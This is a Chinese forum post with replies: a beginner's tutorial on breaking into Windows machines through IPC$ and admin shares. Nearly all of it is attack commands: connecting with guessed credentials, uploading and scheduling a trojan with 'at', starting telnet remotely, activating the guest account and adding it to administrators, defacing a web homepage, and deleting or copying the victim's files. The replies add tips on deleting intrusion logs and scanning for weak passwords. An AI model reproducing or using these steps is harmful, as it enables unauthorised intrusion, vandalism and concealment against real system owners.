[原创]ipc入侵命令补遗及实例

个人认为新手以IPC入门是最好的了.简单易学,危险率也较低.而我也正是新手,也懂得新手入门的烦恼.现在就再发表一篇这样的入门文章吧!希望对提高IPC的入侵有一些帮助.PS1:如果你刚刚开始学,也就是连端口和弱口令等一些基础的知识还没接触的话,那么这篇文章可能不适合你看了:( PS2:本文取材于鹰盟的皮鲁所发表的一篇技术文章. 首先是IPC连接的命令,很多刚接触的新手因为格式错误的原因都会失败,我也曾经试过.:( 传统的命令格式:net use \\127.0.0.1\ipc$ "password" /user:"user" 我现在使用的格式:net use \\127.0.0.1 password /user:user 好了,现在连接上了,接下来是映射: net use z: \\127.0.0.1\c$ 映射的使用方法我没有变化. 映射成功后你会做什么?(或者你不想映射.就像我一样,我不太喜欢映射.不过删日志时确实可以方便一点的)上传木马打开它的23端口?我不建议用这个方法.不过还是先看看传统的命令吧!然后再看我的方法. (传统的方法)===> copy a.bat \\127.0.0.1\c$ (木马我不知道你们用什么,反正我以前是用自己编写的批处理文件的.传上去的路径我就不理了~随便你们吧!) 上去了没?上了,看看时间吧! net time \\127.0.0.1 1:01 好了,知道时间,用AT命令执行刚才传上去的木马吧!(我很喜欢一位前辈说的话:你传上去不执行就算传个炸弹上去又怎么样呢?生动吧!) at \\127.0.0.1 1:03 a.bat 然后检查命令是否成功下达: at \\127.0.0.1 下达了,等时间吧!嗯...该到了吧?看看? net time \\127.0.0.1 1:03 OK了!telnet上它的23端口吧! (我的方法)====> net time \\127.0.0.1 还是要看时间的啦.什么?还没上传木马?不好意思,我的方法用不到它.(还省了以后删它的时间呢!) 1:01 at \\127.0.0.1 1:03 net start telnet 上面的命令是不是有些熟悉呢?呵呵~没错.就是用来打开23端口的命令.不过命令是在它的计算机上执行.(我还记得我以前在自己的计算机上打这个命令,结果打开了自己的23端口,靠~黑了自己了~) net time \\127.0.0.1 1:03 上23端口吧! 上面的就是我的过程了.是不是简单多了?起码不用去找马马. 一般你们上到它的23端口干什么的呢?更改用户?IPC也能做到啊.只要命令运用得当.IPC也能更改用户的.如果你直接打net use a 123 /add就等着这个用户在你自己的机子上出现吧!呵呵~ net time \\127.0.0.1 首先要看时间.不明白为什么要看时间?看下去就明白了! 1:03 at \\127.0.0.1 1:05 net user guest /active:y 呵呵~怎么样?我就是说IPC也能更改的嘛!现在信了吧!剩下变密码什么的自己去做吧!(不知道的就看下面的实例好了~) IPC除了上面的用法还有其它方面的.看下面吧! dir \\127.0.0.1\c$ (看它C盘的内容.当然你可以改盘符和路径看看~) echo hacker >\\127.0.0.1\c$\a.txt (建立一个TXT的文件.内容为hacker.你可以结合上面的命令和这个命令修改它主页的内容!) del \\127.0.0.1\c$\a.txt (删除刚才建立的那个文件.这个命令可以用来删除文件) .................. (剩下的例如建立目录等等的命令就不列举了,自己结合DOS的命令运用吧!你不会因为这个原因说我没尽力帮助你们吧??) 接下来看看实例(IP仍然是本机的地址.只是让大家看看命令的连续执行.不会出现文字说明了): net use \\127.0.0.1 /user:administrator net use z: \\127.0.0.1\c$ dir \\127.0.0.1\c$ dir \\127.0.0.1\c$\inetpub\wwwroot echo sorry! >\\127.0.0.1\c$\inetpub\wwwroot\index.htm copy \\127.0.0.1\d$\音乐\盛夏的果实.mp3 c:\ del \\127.0.0.1\c$\qq\qq.exe net time \\127.0.0.1 2:00 at \\127.0.0.1 2:02 net user guest \active:y at \\127.0.0.1 2:03 net user guest 123456789 at \\127.0.0.1 2:04 net user administrators guest /add at \\127.0.0.1 2:05 net start telnet ---------------<本文完>------------------ 命令不是原创的.但本文可是原创的.呵呵~打字真累啊!看了皮鲁的那篇文章后获益很大.现在也让不知道的人学学吧!看了上面的文章后是不是觉得IPC的功能齐全到有点像TELNET上23端口的效果了?本文对你有没有帮助呢?

看了你写的这篇文章真的有所收益，真的感谢
不过有几个问题想请教
1.入侵日志在哪个地方删除
2.批处理文件的格式是怎样的

谢谢你的支持~
1.日志在系统文件夹里面.像---->>*.log  *.txt 这样的就是了.
2.呵呵~看了上面的文章你还要批处理文件干什么?
net start telnet
把上面的命令保存到记事本里再另存为以bat结尾的文件即可.

我也是菜鸟，真希望多一些如此的文章

看来我的IPC系列还是有点用.>_<

请问在我不知道用户名和密码的情况下，我该怎么样做呢。
有什么软件能够起做用呢。

扫NT弱口令吧!
推荐用流光或者XSCAN.

我作了这样的尝试
写了一份删除默认共享的.bat文件，内容全是net share c$ /del
发觉它并没有起作用呀
所以不知道.bat的文件的格式是什么，来判断一下是否写错了
能否指导一下、

应该用DOS ASCII的格式做的吧，
ULTRAEDIT就可以做了， 记事本也可以了。

@net share ipc$ /del
@net share d$ /del
@net share c$ /del
@net share f$ /del
@net share e$ /del
@net share admin$ /del
另存为a.bat就可以了.

我顶啊